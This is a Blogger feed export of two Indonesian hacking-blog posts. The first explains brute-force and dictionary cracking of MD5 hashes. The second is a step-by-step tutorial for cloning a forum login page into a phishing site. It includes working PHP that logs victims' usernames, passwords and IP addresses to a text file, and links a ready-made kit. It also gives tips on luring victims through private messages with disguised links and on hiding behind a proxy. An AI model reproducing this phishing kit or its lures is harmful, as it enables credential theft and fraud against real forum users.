tag:blogger.com,1999:blog-17999627969483808852024-03-13T20:53:28.733-07:00SecURityInFoT@uLinkerhttp://www.blogger.com/profile/00039899879037329007noreply@blogger.comBlogger2125tag:blogger.com,1999:blog-1799962796948380885.post-43159970322928395272009-02-20T22:15:00.001-08:002009-02-20T22:16:51.964-08:00Bagaimana Cara Cracking md5 ciphered text ?? by malcoderLOGIKA :<br />md5 ( message digest 5 ) ituh adalah enkripsi one way hash yang artinya adalah plain text (text asli) yang sudah ter enkripsi tidak mungkin dikembalikan kedalam bentuk semula.<br /><br />md5 ituh sebanyak apapun plaintextnya pasti akan dibikin menjadi 32 karakter terenkripsi , makanya sering md5 dibikin buat checksum atau pengecekan keabsahan suatu file karena satu karakter saja pun berubah , maka hasil md5nya juga akan berubah , walaupun sudah ditemukan kolisinya beberapa tahun yang lalu.<br /><br />contoh :<br />plaintext : malcoder<br />ciphertext : 8c6d8aed6dc647db4e98ded91049e998<br /><br />plaintext : apapunlah<br />ciphertext : 15cdd0fd997178efc32991ea5a5008ea<br /><br />plaintext : a<br />ciphertext : 0cc175b9c0f1b6a831c399e269772661<br /><br />itu membuktikan pernyataan diatas mengenai teori one way hash . Lalu bagaimana ?? kok bisa dicrack ?? khan gak bisa di decrypt....<br /><br />caranya :<br />harus mengetahui dulu cara2 cracking password salah satunya bruteforce dan dictionary...<br />nah lalu kenapa bisa dicrack ??<br />yah dia bakal ngelakuin hal yang sama yaitu mencoba setiap kombinasi untuk yang bruteforce , dan ngelihat kamus pada metode dictionary...<br /><br />TAPI.... bedanya sebelum melakukan pencocokan ama yang pengen dicrack , mesin mengenkripsi dulu kombinasi atau word dalam wordlistnya dictionary menjadi md5 .. baru setelah itu di cocokkan... selama belum diketemukan kecocokan , maka cracking berlanjut , dan jika udah diketemukan kecocokan , maka dia akan melihat..<br />"YANG MD5 INI PUNYA PLAINTEXT YANG MANA SIH??" nah akhirnya diketemukan plaintextnya...<br /><br />binun ??? hehehe... yaudah saya jelaskan...<br /><br />misalnya :<br /><br />md5 yang pengen kita crack : 4a8a08f09d37b73795649038408b5f33<br /><br />trus si mesin misalnya pake cara bruteforce , trus dia bikin kombinasi semua kemungkinan yang ada dan di encrypt ke md5:<br /><br />plaintext | Ciphertext<br />a 0cc175b9c0f1b6a831c399e269772661 {== gak cocok<br />b 92eb5ffee6ae2fec3ad71c777531578f {== gak cocok<br />c 4a8a08f09d37b73795649038408b5f33 {== COCOK<br /><br />setelah diketemukan mana yang cocok , maka akan dicari nih yang cocok yang punya siapa ??<br />dan diketahui yang punya adalah plaintext "c" berarti md5 yang pengen kita crack tadi text aslinya adalah "c"<br /><br />CRACKED ... tugas selesaiii..<br /><br />mudah2an bisa dimengerti...<br /><br /><br />sumber : http://www.jasakom.com/index.php?categoryid=28&p2_articleid=683T@uLinkerhttp://www.blogger.com/profile/00039899879037329007noreply@blogger.com0tag:blogger.com,1999:blog-1799962796948380885.post-72514207563410742272009-02-13T05:49:00.000-08:002009-02-20T19:52:26.311-08:00Membuat forum Phiserpertama2 anda harus membuat 3 file yaitu<br />index.html<br />next.php<br />ppp.txt<br /><br />nah pada file next.php masukkan code ini<br /><dl class="codebox"><dt>Code:<a href="http://www.jasakom.com/forum/viewtopic.php?f=19&t=5498" onclick="selectCode(this); return false;"> </a></dt><dd>$datum = date('d-m-Y / H:i:s');<br />$ip = $_SERVER['REMOTE_ADDR'];<br />header("Location: http://target.com");<br />$handle = fopen("ppp.txt", "a");<br />foreach($_GET as $variable => $value) {<br />fwrite($handle, $variable);<br />fwrite($handle, "=");<br />fwrite($handle, $value);<br />fwrite($handle, "\r\n");<br />}<br />fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)\r\n");<br />fwrite($handle, "\r\n");<br />fclose($handle);<br /><br />setcookie ("user", "empty", time()+3600);<br />exit;<br />?></dd></dl><br /><br />atau untuk lebih memudahkan anda saya sudah sedian disini...<br /><dl class="codebox"><dt>Code:<a href="http://www.jasakom.com/forum/viewtopic.php?f=19&t=5498" onclick="selectCode(this); return false;"> </a></dt><dd>http://www.mediafire.com/?diddyvyxkwo</dd></dl><br /><br />setelah persiapan diatas selesai sekarang anda menuju target forum yang anda ingin buat phisernya..<img src="http://www.jasakom.com/forum/images/smilies/icon_e_biggrin.gif" com="" images="" smilies="" gif="" alt="<img src=" style="border: medium none ;" border="0" />" title="Very Happy" /><br />pada forum target cari halaman loginnya...<br />setelah anda di forum login click kanan terus view source code ( bila anda menggunakan firefox tekan ctrl+u)<br /><br />copy paste seluruh source codenya ke file index.html yang anda telah sediakan...<br />edit index.html anda trus cari method="post" dan gantikan dengan method="get"<br />cari juga action="alamat link" gantikan dengan action="next.php"<br /><br />dengan itu password log akan disafe di file ppp.txt<br /><br />sekarang upload 3 file tersebut ke freehosting ( wets klo soal ini jgn tanya gue yach... ntar gue dikira promosi lagi T_T)<br /><br />setelah upload terlebih kita check dulu.... nah mungkin anda akan melihat beberapa error<br />nah kita umpakan target kita terlihat seperti <!-- m --><a href="http://dickdownload.com/" class="postlink">http://dickdownload.com/</a><!-- m --> copy url<br /><br />terus pada index.html kita search href=<br />nah kita ganti . dengan alamat forum dia...<br />contohnya:<br /><br />kita menemukan ./styles/hestia_blue/theme/mac.css<br />nah setelah kita ubah jadinya <!-- m --><a href="http://dickdownload.com/styles/hestia_blue/theme/mac.css" class="postlink">http://dickdownload.com/styles/hestia_b ... me/mac.css</a><!-- m --><br /><br />nah lakukan begitu pada semua href link...<br />nah untuk menyamakan style ( gambarnya) kita search src dan lakukan serperti cara diatas...<br /><br />selesai semua kita chmood 777 3 file itu dan menuju ke proses utama.... apa itu ...???<br />tentu saja menipu seseorang dengan phising kita wkakkwakwakwakaw....<br /><br /><br />nah dalam tutorial ini saya akan memberikan sedikit tips and trick...( tentu saja sudah saya lakukan <img src="http://www.jasakom.com/forum/images/smilies/icon_razz.gif" alt=":P" title="Razz" border="0" />)<br /><br />1. Diharapkan menggunakan phising forum pada pm ( private message)<br />2. Jangan membuat phising link anda terlihat pendek ( usahakan panjang )<br />3. Berhubung target kita forum gunakan bbcode nya contohnya<br /> [url=phising link anda]contoh link yang ditujuh[/url]<br />4. Nah usahakan pm ke seseorang tentang suatu topic... ( tergantung creatifitas anda)<br />5. Jangan pernah melakukan phising dengan pm all member<br />6. Tidak lupa saat anda registrasi free hosting gunakan proxy yach ( menjaga kemungkinan terburuk).T@uLinkerhttp://www.blogger.com/profile/00039899879037329007noreply@blogger.com0